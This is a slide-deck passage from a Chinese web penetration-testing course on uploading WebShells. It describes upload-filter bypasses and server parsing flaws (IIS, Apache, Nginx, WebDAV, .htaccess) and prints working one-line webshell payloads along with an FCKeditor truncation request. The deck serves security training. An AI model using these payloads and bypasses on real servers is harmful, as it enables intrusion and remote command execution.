深信服應(yīng)用層安全培訓(xùn)-Web滲透測(cè)試系列-X-文課件

Web滲透測(cè)試系列_X_WebShell上傳Web滲透測(cè)試系列_X_WebShell上傳整體框架WebShell上傳探測(cè)階段WebShell上傳利用階段執(zhí)行WebShellWebShell提權(quán)防御與逃逸常用工具總結(jié)培訓(xùn)提綱整體框架培訓(xùn)提綱整體框架整體框架概述WebShell上傳主要包括探測(cè)和利用階段，具體如下：探測(cè)階段：該階段主要是搜集可測(cè)試點(diǎn)，以方便下一步的利用。利用階段：該階段主要是利用探測(cè)的漏洞上傳并執(zhí)行WebShell。概述WebShell上傳主要包括探測(cè)和利用階段，具體如下：WebShell上傳滲透測(cè)試框架WebShell上傳滲透測(cè)試框架WebShell上傳探測(cè)階段WebShell上傳探測(cè)階段WebShell上傳探測(cè)階段原理說(shuō)明收集過(guò)程WebShell上傳探測(cè)階段原理說(shuō)明原理說(shuō)明上傳探測(cè)階段沒(méi)有什么原理，主要是搜集可探測(cè)點(diǎn)，常見(jiàn)的可測(cè)試點(diǎn)包括應(yīng)用程序上傳功能（諸如上傳頭像、附件上傳等）、用戶可控的輸入點(diǎn)或者參數(shù)（頁(yè)面POST表單部分、url參數(shù)、sql注入點(diǎn)等）、HTTP開(kāi)啟的方法（諸如WebDAV）等，收集可測(cè)試點(diǎn)的過(guò)程中，應(yīng)盡量確保覆蓋范圍，不遺漏每一個(gè)可測(cè)試點(diǎn)，搜集過(guò)程推薦使用WVS工具spider功能。原理說(shuō)明上傳探測(cè)階段沒(méi)有什么原理，主要是搜集可探測(cè)點(diǎn)，常見(jiàn)的收集過(guò)程利用WVS的spider工具收集可測(cè)試點(diǎn)，如下圖：spider發(fā)現(xiàn)了危險(xiǎn)的上傳目錄（紅框1處）、開(kāi)啟了WebDAV方法等漏洞，根據(jù)掃描結(jié)果方便接下來(lái)依據(jù)不同結(jié)果進(jìn)行利用。另外有些可測(cè)試點(diǎn)WVS的spider是爬不出來(lái)，包括內(nèi)斂sql注入點(diǎn)、不允許爬蟲(chóng)掃描的上傳目錄等，這些只能靠手工探測(cè)。收集過(guò)程利用WVS的spider工具收集可測(cè)試點(diǎn)，如下圖：WebShell上傳利用階段WebShell上傳利用階段簡(jiǎn)介直接上傳WebShell繞過(guò)客戶端檢測(cè)上傳WebShell繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell利用服務(wù)器漏洞上傳WebShell利用sql注入上傳WebShell利用WebDAV上傳WebShell利用.htaccess文件上傳WebShell簡(jiǎn)介直接上傳WebShell直接上傳WebShell探測(cè)到上傳點(diǎn)后，接下來(lái)進(jìn)入上傳WebShell步驟，假如服務(wù)器端對(duì)用戶提交參數(shù)或者文件沒(méi)有進(jìn)行過(guò)濾或者過(guò)濾不當(dāng)，則能夠直接上傳WebShell，那么接下來(lái)進(jìn)入執(zhí)行WebShell步驟即可。直接上傳WebShell探測(cè)到上傳點(diǎn)后，接下來(lái)進(jìn)入上傳Web繞過(guò)客戶端檢測(cè)上傳WebShell客戶端檢測(cè)即通過(guò)用戶請(qǐng)求返回頁(yè)面部分的js腳本驗(yàn)證用戶的輸入，該檢測(cè)在客戶端檢測(cè)，具有該檢測(cè)方法的明顯表現(xiàn)是在用戶上傳文件到服務(wù)器之前客戶端js會(huì)進(jìn)行檢測(cè)，假如不符合檢測(cè)要求會(huì)提示相應(yīng)錯(cuò)誤，接下來(lái)舉例說(shuō)明，并列舉出相應(yīng)的繞過(guò)方法。繞過(guò)客戶端檢測(cè)上傳WebShell客戶端檢測(cè)即通過(guò)用戶請(qǐng)求返繞過(guò)客戶端檢測(cè)上傳WebShell服務(wù)器端含有檢測(cè)js腳本的文件UPLOAD_CS_1.aspx代碼如下圖上圖紅框1處是服務(wù)器端返回用戶請(qǐng)求頁(yè)面中用于檢測(cè)客戶端上傳文件類型的js腳本，該客戶端驗(yàn)證要求只能上傳.txt和.docx兩種類型，紅框2處是使用onmouseover事件觸發(fā)check_file函數(shù)。繞過(guò)客戶端檢測(cè)上傳WebShell服務(wù)器端含有檢測(cè)js腳本的繞過(guò)客戶端檢測(cè)上傳WebShell輸入：http://[IP]/UPLOAD_CS_1.aspx，同時(shí)上傳1.jpg文件，頁(yè)面返回如下圖：繞過(guò)客戶端檢測(cè)上傳WebShell輸入：http://[IP繞過(guò)客戶端檢測(cè)上傳WebShell上圖中鼠標(biāo)剛放到“上傳文件”按鈕便彈出了一個(gè)警告對(duì)話框，由此易知這種情況是客戶端js檢驗(yàn)，查看返回頁(yè)面的的源代碼：如上圖可以確定此種情況是客戶端js驗(yàn)證。繞過(guò)客戶端檢測(cè)上傳WebShell上圖中鼠標(biāo)剛放到“上傳文件繞過(guò)客戶端檢測(cè)上傳WebShell接下來(lái)使用代理工具繞過(guò)客戶端驗(yàn)證，例如上傳1.asp文件，先將文件名改為1.txt，代開(kāi)burpsuite代理工具，點(diǎn)擊“上傳文件”按鈕，burpsuite截獲如下圖：繞過(guò)客戶端檢測(cè)上傳WebShell接下來(lái)使用代理工具繞過(guò)客戶繞過(guò)客戶端檢測(cè)上傳WebShell把上圖紅框處1.txt改為1.asp，然后點(diǎn)擊“forward”按鈕，查看服務(wù)器端Files文件夾，如下圖。從上圖可以得出結(jié)論利用代理工具成功繞過(guò)客戶端驗(yàn)證繞過(guò)客戶端檢測(cè)上傳WebShell把上圖紅框處1.txt改為繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell服務(wù)器端文件擴(kuò)展名檢測(cè)是指服務(wù)器端應(yīng)用程序通過(guò)檢測(cè)用戶上傳文件的后綴名從而做出允許或者阻止的一種方法，該方法包含黑名單和白名單兩種形式，具體如下：黑名單檢測(cè)：一般是建立一個(gè)專門的blacklist文件，里面枚舉常見(jiàn)的危險(xiǎn)文件后綴。白名單檢測(cè)：一般是定義一個(gè)允許或者阻止用戶上傳文件類型的后綴的文件，里面枚舉相應(yīng)的文件后綴。繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell服務(wù)器端文件擴(kuò)展繞過(guò)黑名單檢測(cè)方法文件名大小寫繞過(guò)用向AsP、Aspx之類的文件名繞過(guò)黑名單檢測(cè)；名單列表繞過(guò)用黑名單里沒(méi)有的名單進(jìn)行攻擊，iis默認(rèn)執(zhí)行.asp、.asa、.cer，有時(shí)候黑名單過(guò)濾不全沒(méi)有過(guò)濾掉像后綴為asa、cer之類的，但這些文件可以像asp文件一樣執(zhí)行，此時(shí)可以使用這些后綴繞過(guò)黑名單。繞過(guò)黑名單檢測(cè)方法文件名大小寫繞過(guò)繞過(guò)黑名單檢測(cè)方法特殊文件名繞過(guò)比如發(fā)送的HTTP包里把文件名改成test.asp.或test.asp_(下劃線為空格)，這兩種命名方式在windows系統(tǒng)里是不被允許的，所以需要在代理工具burpsuite進(jìn)行修改，然后繞過(guò)驗(yàn)證后，會(huì)被windows系統(tǒng)自動(dòng)去掉后面的點(diǎn)和空格，但注意Unix/Linux系統(tǒng)沒(méi)有此特性。0x00截?cái)嘣谠S多語(yǔ)言的常用字符串處理函數(shù)中，0x00被認(rèn)為是終止符，比如應(yīng)用只允許上傳jpg圖片，那么可以構(gòu)造文件名為2.asp%00.jpg，.jpg繞過(guò)了應(yīng)用的上傳文件類型判斷，但對(duì)于服務(wù)器來(lái)說(shuō)，此文件因?yàn)?00字符截?cái)嗟年P(guān)系，最終會(huì)以2.asp存入路徑里。繞過(guò)黑名單檢測(cè)方法特殊文件名繞過(guò)繞過(guò)白名單檢測(cè)方法0x00截?cái)嗷诎酌麊螜z查主要使用0x00截?cái)嗬@過(guò)，同黑名單0x00截?cái)嗬@過(guò)，接下來(lái)舉例說(shuō)明。服務(wù)器端白名單檢測(cè)文件為UPLOAD_CS.aspx.cs，部分代碼如下圖繞過(guò)白名單檢測(cè)方法0x00截?cái)嗬@過(guò)白名單檢測(cè)方法上圖紅框處枚舉了允許上傳gif、GIF、swf、SWF后綴文件，該部分為該代碼的白名單檢測(cè)部分，同時(shí)該文件用白名單規(guī)定了不允許上傳后綴文件，如下圖如上圖可以看出使用了白名單規(guī)定了不允許上傳后綴為asp、aspx以及dll的文件，接下來(lái)實(shí)驗(yàn)使用%00繞過(guò)驗(yàn)證，具體如下繞過(guò)白名單檢測(cè)方法上圖紅框處枚舉了允許上傳gif、GIF、s繞過(guò)白名單檢測(cè)方法輸入：http://[IP]/UPLOAD_CS_2.aspx，如果直接上傳2.asp文件，頁(yè)面返回如下圖上圖顯示上傳后綴為asp的文件失敗，把上傳文件名改為2.asp.%00.jpg，繼續(xù)上傳，頁(yè)面返回如圖繞過(guò)白名單檢測(cè)方法輸入：http://[IP]/UPLOAD繞過(guò)白名單檢測(cè)方法上圖顯示上傳后綴為asp的文件失敗，把上傳文件名改為2.asp.%00.jpg，繼續(xù)上傳，頁(yè)面返回如圖從上圖可以得出結(jié)論成功上傳2.asp%00.jpg文件，.jpg繞過(guò)了應(yīng)用的白名單檢測(cè)，但對(duì)于服務(wù)器來(lái)說(shuō)，由于后臺(tái)某些函數(shù)作用（諸如CreateTextFile()），此文件會(huì)被%00字符截?cái)?，最終會(huì)以2.asp存入路徑里。繞過(guò)白名單檢測(cè)方法上圖顯示上傳后綴為asp的文件失敗，把上傳繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell有時(shí)候僅僅對(duì)文件名后綴進(jìn)行判斷并不能有效阻止惡意文件的上傳（比如某服務(wù)器只允許上傳jpg文件格式，不允許上傳后綴為php等文件，但是把后綴為php改為后綴為jpg上傳到服務(wù)器，某些情況下也能執(zhí)行上傳文件），因此對(duì)文件格式進(jìn)行檢測(cè)十分必要，也就是服務(wù)器端MIME類型檢測(cè)。服務(wù)器端MIME類型檢測(cè)asp、aspx利用response對(duì)象的ContentType屬性，php利用$_FILES[‘userfile’][‘type’]、jsp也使用response對(duì)象的ContentType屬性（與asp類似）。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell有時(shí)候僅僅對(duì)文繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell接下來(lái)以aspx為例通過(guò)檢測(cè)http包的content-type字段的值來(lái)判斷上傳文件是否合法，實(shí)驗(yàn)使用的服務(wù)器端文件為mime.aspx，部分代碼如下圖。上圖紅框處使用POSTFile對(duì)象的ContentType屬性，限定只允許上傳application/zip類型。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell接下來(lái)以asp繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell輸入：http://[IP]/mime.aspx，上傳文件2.asp文件，頁(yè)面返回如下圖。上圖返回錯(cuò)誤頁(yè)面，提示“不支持的mime文件”，接下來(lái)使用burpsuite攔截請(qǐng)求，如下圖。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell輸入：http繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell修改圖上圖中紅框處為application/zip，再次上傳2.asp文件，查看files文件夾（該文件夾為上傳文件默認(rèn)目錄），頁(yè)面返回下圖。上圖頁(yè)面返回顯示2.asp文件上傳成功。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell修改圖上圖中紅繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell文件內(nèi)容檢測(cè)即通過(guò)檢測(cè)特定文件某些特殊標(biāo)志位來(lái)判斷是否是允許上傳的文件，比如以后綴為jpg圖片文件為例，該文件頭有一組特殊二進(jìn)制數(shù)標(biāo)識(shí)FFD8FFE000104A464946（這些二進(jìn)制數(shù)也叫文件幻數(shù)），那么就可以通過(guò)判斷上傳文件的文件頭來(lái)驗(yàn)證文件的類型。其實(shí)檢測(cè)文件幻數(shù)只是檢測(cè)的一項(xiàng)內(nèi)容，還可以對(duì)文件相關(guān)信息、文件渲染加載后檢測(cè)，面對(duì)這些檢測(cè)，可以把一句話木馬注入圖片文件最后面，這樣既實(shí)現(xiàn)了代碼注入也不會(huì)破壞圖片結(jié)構(gòu)，具體步驟如下：代碼注入圖片引用創(chuàng)建的文件使用客戶端連接一句話木馬繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell文件內(nèi)容檢測(cè)即通過(guò)檢測(cè)特代碼注入圖片首先準(zhǔn)備圖片picture.jpg，然后把a(bǔ)sp一句話木馬（諸如<%execute(request(“value”))%>）插入圖片最后，如下圖所示上圖紅框1出為標(biāo)識(shí)jpg文件的幻數(shù)，紅框2處為植入的一句話木馬，把該圖片上傳到服務(wù)器端。代碼注入圖片首先準(zhǔn)備圖片picture.jpg，然后把a(bǔ)sp引用創(chuàng)建的文件同時(shí)創(chuàng)建一個(gè)引用包含一句話木馬的圖片的文件picture.asp，代碼如下：<!--#includefile="picture.jpg"-->把該文件上傳到服務(wù)器端(這里之所以先上傳jpg文件，再上傳一個(gè)引用上傳jpg的asp文件，主要目的是為了隱藏一句話木馬的目的)。引用創(chuàng)建的文件同時(shí)創(chuàng)建一個(gè)引用包含一句話木馬的圖片的文件pi使用客戶端連接一句話木馬客戶端代碼c1.html代碼如下圖：其中Adodb.Stream是ADO的Stream對(duì)象，提供存取二進(jìn)制數(shù)據(jù)或者文本流，從而實(shí)現(xiàn)對(duì)流的讀、寫和管理等操作。使用客戶端連接一句話木馬客戶端代碼c1.html代碼如下圖：使用客戶端連接一句話木馬該代碼主要是服務(wù)器端一句話木馬s1.asp接收c1.html第一個(gè)textarea里的值生成一個(gè)newmm.asp大馬文件，同時(shí)利用lP.writetextrequest("CMD")接收第二個(gè)textarea大馬內(nèi)容寫入newmm.asp文件里，這樣直接訪問(wèn)newmm.asp文件，即獲得了WebShell。使用瀏覽器打開(kāi)客戶端c1.html，如圖下圖所示使用客戶端連接一句話木馬該代碼主要是服務(wù)器端一句話木馬s1.使用客戶端連接一句話木馬上圖紅框處為海洋2005木馬，點(diǎn)擊提交后，訪問(wèn)上傳木馬，如下圖。如上圖可知上傳WebShell成功。使用客戶端連接一句話木馬上圖紅框處為海洋2005木馬，點(diǎn)擊提繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell服務(wù)器端目錄路徑檢測(cè)即對(duì)用戶提交目錄路徑參數(shù)進(jìn)行檢測(cè)，有時(shí)候檢測(cè)不夠嚴(yán)謹(jǐn)而導(dǎo)致可以用%00截?cái)噙M(jìn)行攻擊，該漏洞的本質(zhì)同黑名單檢測(cè)%00截?cái)啾举|(zhì)一樣，但該漏洞要求服務(wù)器端應(yīng)用程序具有處理用戶提交的目錄路徑參數(shù)函數(shù)，不具有通用性，這里僅介紹下原理。以fckeditorphp<=2.6.4任意文件上傳漏洞為例，存在漏洞代碼如下圖繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell服務(wù)器端目錄路徑檢繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell輸入：/fckeditor264/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=fuck.php%00.gifHPPT/1.0CurrentFolder這個(gè)變量的值會(huì)傳到上圖有漏洞代碼ServerMapFolder($resourceType,$folderPath,$sCommand)中的形參$folderPath里，而$folderPath在這個(gè)函數(shù)中并沒(méi)做任何檢測(cè)，就傳入CombinePaths()函數(shù)，同時(shí)變量CurrentFolder中%00后面的會(huì)被截?cái)?，?shí)際上傳的是fuck.php。繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell輸入：利用過(guò)濾不完全上傳WebShell利用過(guò)濾不完全把一句木馬寫入服務(wù)器端是目前得到WebShell的最為主要的方法之一，該方法分為兩步，具體如下：上傳一句話木馬：常見(jiàn)的一句話木馬分為asp一句話、aspx一句話、php一句話以及jsp一句話，它們工作原理大致類似，這里以asp一句話木馬為例，代碼為：<%executerequest("value")%>使用客戶端連接上傳大馬：客戶端代碼使用繞過(guò)文件內(nèi)容檢測(cè)上傳c1.html。利用過(guò)濾不完全上傳WebShell利用過(guò)濾不完全把一句木馬寫上傳一句話木馬使用上傳頁(yè)面上傳一句話木馬如下：上圖為上傳WebShell的上傳頁(yè)面。上傳一句話木馬使用上傳頁(yè)面上傳一句話木馬如下：使用客戶端連接上傳大馬使用瀏覽器打開(kāi)客戶端c1.html，如下圖上圖紅框處為海洋2005木馬，點(diǎn)擊提交后，訪問(wèn)上傳木馬，如圖下從上圖可知獲得了一個(gè)WebShell，其實(shí)小馬上傳成功后是不需要再上傳大馬了，通過(guò)POST表單方式傳遞給小馬照樣可以執(zhí)行大馬（即大馬在內(nèi)存中執(zhí)行），且隱藏性更強(qiáng)。使用客戶端連接上傳大馬使用瀏覽器打開(kāi)客戶端c1.html，如利用服務(wù)器漏洞上傳WebShell解析漏洞產(chǎn)生是由于webserver本身特性功能設(shè)計(jì)存在缺陷造成的漏洞，如果加以利用，將會(huì)變成威力巨大的武器，本節(jié)內(nèi)容如下：IIS6.0解析漏洞1IIS6.0解析漏洞2IIS7.0/7.5解析漏洞Apache文件解析漏洞Nginx解析漏洞利用服務(wù)器漏洞上傳WebShell解析漏洞產(chǎn)生是由于webIIS6.0解析漏洞1此洞原理是處理文件擴(kuò)展名出錯(cuò)，導(dǎo)致將/.*asp/目錄下的所有文件都作為asp文件進(jìn)行解析。此外具有此特性的不單單是類似/.*asp/目錄，還包括/.*cer/、/.*asa/、/.*cdx/、/.*cer\(此種類型瀏覽器直接輸入不允許，需要借助burpsuite工具)、/.*asa\、/.*cdx\目錄，本例子以/.*asp/目錄舉例。IIS6.0解析漏洞1此洞原理是處理文件擴(kuò)展名出錯(cuò)，導(dǎo)致將/IIS6.0解析漏洞1假如服務(wù)器端存在一個(gè)文件名為test.asp目錄，且在該目錄建立實(shí)驗(yàn)文件2.jpg，代碼如下圖：輸入：http://[IP]/test.asp/2.jpg，頁(yè)面返回如下圖所示。從上圖可知2.jpg文件被IIS6.0解釋執(zhí)行了。IIS6.0解析漏洞1假如服務(wù)器端存在一個(gè)文件名為test.IIS6.0解析漏洞2該漏洞的原理是IIS6.0不能正確夠解析文件名包含分號(hào)（;）的文件，因此諸如2.asp;xx.jpg類似的文件會(huì)被解析成2.asp可執(zhí)行文件，從而導(dǎo)致腳本被執(zhí)行。此外具有此特性的不單單是類似2.asp;xx.jpg，還包括2.cer;xx.jpg、2.asa;xx.jpg、2.cdx;xx.jpg類型，本例子以2.asp;xx.jpg類型舉例。服務(wù)器端新建立一個(gè)文件名為2.asp;xx.jpg的文件，內(nèi)容與漏洞1中2.jpg文件內(nèi)容一樣，輸入：http://[IP]/2.asp;.jpg，頁(yè)面返回如下圖。從上圖可知2.asp;xx.jpg文件得以執(zhí)行。IIS6.0解析漏洞2該漏洞的原理是IIS6.0不能正確夠解IIS7.0/7.5解析漏洞IIS7.0/7.5是對(duì)php解析時(shí)有一個(gè)解析漏洞，只要在url后面追加上字符串"/任意文件名.php"就會(huì)按照php的方式去解析，其實(shí)這個(gè)漏洞是出自php-cgi的漏洞，與IIS7.0/7.5本身無(wú)關(guān)，具體例子如下。服務(wù)器端test.jpg代碼為：<?phpecho"HelloWorld";?>輸入：http://[IP]/test.jpg/noexist.php，會(huì)將test.jpg當(dāng)做php進(jìn)行解析，其中noexist.php是不存在的文件（但后綴必須是.php），頁(yè)面返回如下圖所示從上圖可知test.jpg中的代碼得到了執(zhí)行。IIS7.0/7.5解析漏洞IIS7.0/7.5是對(duì)phpApache文件解析漏洞Apache對(duì)于文件名的解析是從后往前解析的，直到遇見(jiàn)一個(gè)apache認(rèn)識(shí)的文件類型為止，比如phpshell.php.rar.rar，由于apache不認(rèn)識(shí).rar文件類型，所以會(huì)一直遍歷后綴直到.php，然后認(rèn)為這是個(gè)php類型的文件，這樣的話可以上傳一個(gè)包含一句話木馬文件名類似phpshell.php.rar.rar的文件，訪問(wèn)該文件將會(huì)被當(dāng)成php文件解析執(zhí)行，具有此漏洞的版本包括：Apache2.2.11、Apache2.2.17、Apache2.2.6、Apache2.0.59、Apache2.2.8，接下來(lái)以Apache2.0.59為例，具體如下。Apache文件解析漏洞Apache對(duì)于文件名的解析是從后往Apache文件解析漏洞訪問(wèn)：http://[IP]/phpinfo.php，查看務(wù)器apache版本號(hào)上傳phpshell.php.rar.rar，其包含菜刀一句話木馬：<?php@eval($_POST['chopper']);?>Apache文件解析漏洞訪問(wèn)：http://[IP]/phpApache文件解析漏洞上傳phpshell.php.rar.rar到（默認(rèn)上傳到upload文件夾下），使用菜刀連接該一句話木馬如下圖使用菜刀文件管理功能，打開(kāi)如下圖從上圖可知文件phpshell.php.rar.rar被解析成php文件進(jìn)行執(zhí)行了。Apache文件解析漏洞上傳phpshell.php.rarNginx解析漏洞該漏洞是對(duì)一個(gè)任意文件名，在后面添加/任意文件名.php的解析漏洞，比如源文件名為nginx.jpg，可以添加成nginx.jpg/x.php，nginx就會(huì)把nginx.jpg當(dāng)成php文件來(lái)解析，其實(shí)可以說(shuō)說(shuō)這個(gè)漏洞與nginx本身關(guān)系不大，nginx只是作為一個(gè)代理把請(qǐng)求轉(zhuǎn)發(fā)給fastcgiserver，php在后端處理這一切，漏洞原因在fasgcgi方式下，php獲取環(huán)境變量的方式有關(guān)，該漏洞官方?jīng)]有補(bǔ)丁，php認(rèn)為是一個(gè)新特性，為預(yù)防該漏洞官方建議修改php.ini文件中cgi.fix_pathinfo為0，具體例子如下。Nginx解析漏洞該漏洞是對(duì)一個(gè)任意文件名，在后面添加/任意Nginx解析漏洞nginx.jpg包含php代碼：<?php@eval(phpinfo());?>，把該文件上傳到服務(wù)器端/upload下，訪問(wèn)：http://[IP]/nginx.jpg/a.php，使用菜刀文件管理，如下圖所示從上圖可知nginx.jpg文件被作為php文件進(jìn)行了解析。nginx還有一個(gè)自身的漏洞，就是它可以對(duì)任意文件名后面添加%00.php當(dāng)成php文件來(lái)解析，該漏洞出現(xiàn)在nginx較低版本，包括nginx0.5.*、nginx0.6.*、nginx0.7<=0.7.65、nginx0.8<=0.8.37，這些版本比較低不做詳細(xì)實(shí)驗(yàn)。Nginx解析漏洞nginx.jpg包含php代碼：<?ph利用sql注入上傳WebShell利用sql注入漏洞寫入服務(wù)器端是比較常用的，這里以mssql為例子，在sysadmin權(quán)限下可以利用xp_cmdshell、xp_cmdshell存儲(chǔ)過(guò)程獲得WebShell，在db_owner下可以利用差異備份獲得WebShell，此類方法具體可參考Web滲透測(cè)試_Mssql注入分析說(shuō)明書(shū)中存儲(chǔ)過(guò)程章節(jié)，這里不做詳細(xì)敘述。利用sql注入上傳WebShell利用sql注入漏洞寫入服務(wù)利用WebDAV上傳WebShellWebDAV大大擴(kuò)展了HPPT協(xié)議中的GET、POST、HEAD等功能，利用其中的PUT、MOVE方法可以上傳并修改上傳的文件，從而獲得WebShell，具體步驟如下：通過(guò)OPTIONS探測(cè)服務(wù)器信息利用PUT方法上傳文件通過(guò)MOVE方法修改上傳文件名執(zhí)行修改后的文件利用WebDAV上傳WebShellWebDAV大大擴(kuò)展了H通過(guò)OPTIONS探測(cè)服務(wù)器信息使用burpsuite構(gòu)造一個(gè)POST請(qǐng)求，POST負(fù)載是自己構(gòu)造的腳本，具體如下圖所示：通過(guò)OPTIONS探測(cè)服務(wù)器信息使用burpsuite構(gòu)造一通過(guò)OPTIONS探測(cè)服務(wù)器信息上圖中紅框處為負(fù)載即需要上傳的腳本，然后把POST方法修改為OPTIONS方法，返回頁(yè)面如下圖所示：上圖紅框處可知系統(tǒng)支持PUT、MOVE方法通過(guò)OPTIONS探測(cè)服務(wù)器信息上圖中紅框處為負(fù)載即需要上傳利用PUT方法上傳文件修改步驟1構(gòu)造的POST表單方法為PUT方法，如下圖所示：由上圖紅框處可知上傳文件成功利用PUT方法上傳文件修改步驟1構(gòu)造的POST表單方法為PU通過(guò)MOVE方法修改上傳文件名同樣步驟1構(gòu)造的POST表單方法為MOVE方法，但必須添加Destination頭，具體如下圖所示：使用MOVE原文件3.txt為3.asp，頁(yè)面返回如下圖通過(guò)MOVE方法修改上傳文件名同樣步驟1構(gòu)造的POST表單方執(zhí)行修改后的文件輸入：http://[IP]/3.asp，頁(yè)面返回如下圖：如上圖可知執(zhí)行了上傳并修改后的文件。執(zhí)行修改后的文件輸入：http://[IP]/3.asp，頁(yè)利用.htaccess文件上傳WebShell.htaccess文件的作用主要是對(duì)主配置文件沒(méi)有訪問(wèn)權(quán)限，但又想改變某目錄配置情況下使用，假如服務(wù)器端沒(méi)有過(guò)濾后綴為.htaccess文件，那么攻擊者可以構(gòu)造該文件修改所在目錄文件的配置，比如修改該文件下含“haha”字符串的所有文件按照php文件來(lái)解析，那么攻擊者在上傳構(gòu)造的.htaccess文件后，再上傳仍以后綴只有包含“haha”字符串的一句話木馬文件，該文件會(huì)被當(dāng)成php文件解析，具體步驟如下：建立特定.htaccess文件建立一句話木馬文件上傳上述文件，并使用菜刀連接利用.htaccess文件上傳WebShell.htacce建立特定.htaccess文件建一個(gè).htaccess文件，指定同目錄下只要文件內(nèi)包含字符串“haha“，無(wú)論該文件后綴是什么都會(huì)當(dāng)成php文件進(jìn)行解析，該文件.htaccess具體如下圖：上圖中SetHandler指令的作用是當(dāng)這個(gè)指令放入.htaccess或<Directory>或<Location>配置段中時(shí)，這個(gè)指令將強(qiáng)制所有匹配的文件通過(guò)handler-name指定的處理器處理，該例子中凡是文件中包含“haha“字段文件都會(huì)按照php文件進(jìn)行解析。建立特定.htaccess文件建一個(gè).htaccess文建立一句話木馬文件建立一句話木馬文件php-WebShell-haha.txt，其代碼如下圖：上圖是菜刀連接的一句話木馬。建立一句話木馬文件建立一句話木馬文件php-WebShell上傳WebShell上傳.htaccess和php-WebShell-haha.txt文件到upload文件夾下，訪問(wèn)php-WebShell-haha.txt文件，如下圖：使用菜刀連接該一句話木馬，如下圖所示使用菜刀的鏈接可知成功連接了一句話木馬，具體如下：上傳WebShell上傳.htaccess和php-Web執(zhí)行WebShell執(zhí)行WebShell簡(jiǎn)介尋找上傳的WebShell在asp環(huán)境下運(yùn)行命令在php環(huán)境下運(yùn)行命令在jsp環(huán)境下運(yùn)行命令在其它腳本

環(huán)境下運(yùn)行命令簡(jiǎn)介尋找上傳的WebShell尋找上傳的WebShell完成上傳WebShell并不意味著可以一定執(zhí)行，有時(shí)候WebShell是上傳成功了，但是找到上傳路徑是一件很費(fèi)力的事，以下分兩種情況介紹，具體如下：情況1情況2尋找上傳的WebShell完成上傳WebShell并不意味著情況1利用諸如上傳頭像、上傳文件等上傳點(diǎn)上傳WebShell（包括直接上傳、繞過(guò)客戶端、繞過(guò)服務(wù)器端文件擴(kuò)展名、繞過(guò)mime類型、繞過(guò)文件內(nèi)容檢測(cè)、利用過(guò)濾不全），此種情況上傳文件完成后一般會(huì)向用戶反饋上傳文件的完整url，即使不反饋，這些路徑也很容易猜測(cè)出來(lái)，例如常見(jiàn)的目錄有/photo、/image、/upload等。情況1利用諸如上傳頭像、上傳文件等上傳點(diǎn)上傳WebShell情況2此類尋找上傳WebShell更加方便（包括利用服務(wù)器漏洞、利用sql注入以及利用WebDAV上傳WebShell），接下來(lái)分別介紹怎樣尋找上傳WebShell的路徑，具體如下：利用服務(wù)器漏洞上傳WebShell：該方法IIS6.0解析漏洞1事先探知服務(wù)器端存在諸如test.asp類型目錄，這種情況上傳前是知道上傳目錄的。IIS6.0解析漏洞2以及IIS7.0/IIS7.5類似，是事先探知服務(wù)器使用IIS6.0或者IIS7.0/IIS7.5，這種情況上傳文件完成后一般會(huì)向用戶反饋上傳文件的完整url，不反饋只能靠猜測(cè)。利用sql注入漏洞上傳WebShell：該方法一般都是先探測(cè)好站點(diǎn)主目錄以及主目錄下一個(gè)具有可寫權(quán)限文件后，才向該文件傳入一個(gè)WebShell，因此此種類型不存在上傳后找不到上傳的WebShell的情況。利用WebDAV上傳WebShell：該方法同利用sql注入漏洞上傳WebShell，也是先探測(cè)好站點(diǎn)主目錄以及主目錄下一個(gè)具有可寫權(quán)限文件后，才向該文件傳入一個(gè)WebShell。情況2此類尋找上傳WebShell更加方便（包括利用服務(wù)器漏在asp環(huán)境下運(yùn)行命令由于VBScript與JavaScript腳本本身變成能力有限，當(dāng)拿到一個(gè)asp的WebShell時(shí)，想運(yùn)行命令，一般使用以下組件：wscript.shell組件shell.application組件在asp環(huán)境下運(yùn)行命令由于VBScript與JavaScr使用wscript.shell組件執(zhí)行系統(tǒng)命令，有時(shí)候服務(wù)器會(huì)在注冊(cè)表中修改該組件對(duì)應(yīng)的名稱，沒(méi)有真正的卸載或者刪除，因此程序中調(diào)用該組件使用其classid，classid值在不同系統(tǒng)下有所不同，常見(jiàn)值有兩種分別是72C24DD5-D70A-438B-8A42-98424B88AFB8和F935DC22-1CF0-11D0-ADB9-00C04FD58A0B。服務(wù)器端asp_wscript.asp代碼如下圖所示wscript.shell組件使用wscript.shell組件執(zhí)行系統(tǒng)命令，有時(shí)候服務(wù)器接下來(lái)輸入：http://[IP]/asp_wscript.asp，頁(yè)面返回如圖6-2所示。從圖6-2可知，服務(wù)器端程序執(zhí)行了用戶輸入的命令，不過(guò)使用該組件也有局限性，當(dāng)用戶以匿名用戶訪問(wèn)的時(shí)候提示沒(méi)有權(quán)限，改為administrator時(shí)候程序才可以執(zhí)行。wscript.shell組件接下來(lái)輸入：http://[IP]/asp_wscript.使用shell.application組件具體參考海陽(yáng)頂端2005α版源代碼，部分代碼如圖下圖所示。輸入：http://[IP]/newmm.asp，頁(yè)面返回如下圖所示上圖紅框處可知海洋木馬使用shell.application組件執(zhí)行了用戶輸入的命令。shell.application組件使用shell.application組件具體參考海陽(yáng)頂端2在aspx環(huán)境下運(yùn)行命令與VBScript與JavaScript腳本不同，.net具有強(qiáng)大的函數(shù)庫(kù)，因此它的運(yùn)行不依賴與注冊(c